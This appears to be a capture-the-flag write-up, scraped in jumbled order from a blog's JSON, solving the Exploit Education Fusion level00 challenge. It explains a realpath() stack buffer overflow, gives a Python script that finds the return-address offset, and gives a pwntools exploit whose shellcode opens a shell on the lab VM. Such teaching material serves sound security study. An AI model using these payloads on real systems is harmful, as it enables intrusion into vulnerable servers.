This is a simple introduction to get you warmed up.<\/p>\n
The description and source code can be found here: If you worked through the Phoenix challenges, this one should be really easy. But if you’re like me and took a break since doing those, you’ll appreciate this refresher.<\/p>\n We can connect to the VM on port 20,000 using netcat, but unless you understand the program, you won’t know what to send it. Let’s look at the source code to see what type of input it’s expecting. The The This function does a few things:<\/p>\n We can see that the program is supposed to act like a web server that only accepts the first line of an HTTP GET request. Normally, you might expect the path to be something like Next, the program calls the Now you can see where our buffer overflow vulnerability exists. Now, I could do this completely remotely via fuzzing. I can keep increasing the amount of input to the “resolved” variable until I no longer get a response from the server, indicating a crash. This time, however, I’ll just use First, on the Fusion VM itself, I’ll clear the log:<\/p>\n Then I’ll run the script:<\/p>\n And check the VM again:<\/p>\n We can see that the string of E’s (0x45) were the ones to overwrite EIP. This means that EIP is saved 140 bytes after the start of the “resolved” variable. Now we can build an exploit. Fortunately, the challenge site gives us valuable information. It tells us that there are no protections (e.g. ASLR or NX) and hints that we should put shellcode after the This will be my first use of the Python pwntools library:<\/p>\n I know that you’ll generally want to import the pwntools functionality into the global namespace with Let’s run it:<\/p>\n Success!<\/p>\n","protected":false},"excerpt":{"rendered":"
\nhttp:\/\/exploit.education\/fusion\/level00\/<\/a><\/p>\nmain()<\/code> function just sets everything up and calls the first function:<\/p>\n\r\nint main(int argc, char **argv, char **envp)\r\n{\r\n int fd;\r\n char *p;\r\n\r\n background_process(NAME, UID, GID); \r\n fd = serve_forever(PORT);\r\n set_io(fd);\r\n\r\n parse_http_request(); \r\n}<\/pre>\nparse_http_request()<\/code> function is the bulk of the code:<\/p>\n\r\nchar *parse_http_request()\r\n{\r\n char buffer[1024];\r\n char *path;\r\n char *q;\r\n\r\n printf("[debug] buffer is at 0x%08x :-)\\n", buffer);\r\n\r\n if(read(0, buffer, sizeof(buffer)) <= 0)\r\n errx(0, "Failed to read from remote host");\r\n if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");\r\n\r\n path = &buffer[4];\r\n q = strchr(path, ' ');\r\n if(! q) errx(0, "No protocol version specified");\r\n *q++ = 0;\r\n if(strncmp(q, "HTTP\/1.1", 8) != 0) errx(0, "Invalid protocol");\r\n\r\n fix_path(path);\r\n\r\n printf("trying to access %s\\n", path);\r\n\r\n return path;\r\n}<\/pre>\n\n
sizeof(buffer)<\/code>).<\/li>\nGET <\/code>, including the space. If they do not equal, the program exits.<\/li>\nHTTP\/1.1<\/code>. If they do not equal, the program exits.<\/li>\n<\/ul>\n\/index.html<\/code>. So let’s test this with netcat:<\/p>\n\r\nandrew ~ $ nc fusion 20000\r\n[debug] buffer is at 0xbffff8f8 :-)\r\nGET \/index.html HTTP\/1.1\r\ntrying to access \/index.html\r\n<\/pre>\n
NOTE: I added an entry to my \/etc\/hosts file so that \"fusion\" resolves to the VMs IP address<\/pre>\n
fix_path()<\/code> function while passing the “path” pointer to it. The main purpose of this function is to call the realpath()<\/code> function (returns the canonicalized absolute pathname) on the user-supplied path and save the result to the “resolved” variable:<\/p>\n\r\nint fix_path(char *path)\r\n{\r\n char resolved[128];\r\n \r\n if(realpath(path, resolved) == NULL) return 1; \r\n \/\/ can't access path. will error trying to open\r\n\r\n strcpy(path, resolved);\r\n}<\/pre>\nThe strcpy() function is called with no bounds checking.<\/del> The realpath()<\/code> function will copy the string pointed to by *path<\/code> into the resolved<\/code> buffer. We should be able to overwrite the return address in this function’s stack frame. The only question that remains is, where is that address? In the past, I’ve used tools that generate a de Bruijn sequence (e.g. github.com\/Svenito\/exploit-pattern<\/a>) for finding the exact offset of the saved EIP. However, that won’t be necessary here.<\/p>\ndmesg<\/code> to see the kernel messages. I’ll write a simple Python script to try to determine where EIP is on the stack:<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nimport socket\r\nimport struct\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(("fusion", 20000))\r\n\r\npayload = b"GET \/"\r\npayload += b"A" * 127 # fill the 'resolved' buffer\r\npayload += b"B" * 4\r\npayload += b"C" * 4\r\npayload += b"D" * 4\r\npayload += b"E" * 4\r\npayload += b" HTTP\/1.1"\r\n\r\nprint(s.recv(1024).strip())\r\ns.sendall(payload)\r\nprint(s.recv(1024).strip())\r\n<\/pre>\n\r\nfusion@fusion:~$ sudo dmesg -c\r\n...\r\n<\/pre>\n
\r\nandrew ~\/fusion $ .\/level00_fuzz.py \r\nb'[debug] buffer is at 0xbffff8f8 :-)'\r\nb''\r\n<\/pre>\n
\r\nfusion@fusion:~$ dmesg\r\n[ 7378.989633] level00[2216]: segfault at 45454545 ip 45454545 sp bffff8e0 error 14\r\n<\/pre>\n
HTTP\/1.1<\/code> string.<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nimport pwn\r\n\r\nio = pwn.remote("fusion", 20000)\r\n\r\n# buffer is at 0xbffff8f8\r\ntarget = pwn.p32(0xbffff8f8 + 157)\r\n\r\nshellcode = pwn.asm(pwn.shellcraft.sh())\r\n\r\npayload = b"GET \/" + b"A"*127 # fill the 'resolved' buffer\r\npayload += b"B"*12\r\npayload += target\r\npayload += b" HTTP\/1.1"\r\npayload += shellcode\r\n\r\nprint(io.recv().decode())\r\nio.sendline(payload)\r\nio.interactive()\r\n<\/pre>\nfrom pwn import *<\/code>. However, this time I’d like to show which functions belong to pwntools.<\/p>\n\r\nandrew ~\/fusion $ .\/level00_pwn.py \r\n[+] Opening connection to fusion on port 20000: Done\r\n[debug] buffer is at 0xbffff8f8 :-)\r\n\r\n[*] Switching to interactive mode\r\n$ id\r\nuid=20000 gid=20000 groups=20000\r\n<\/pre>\n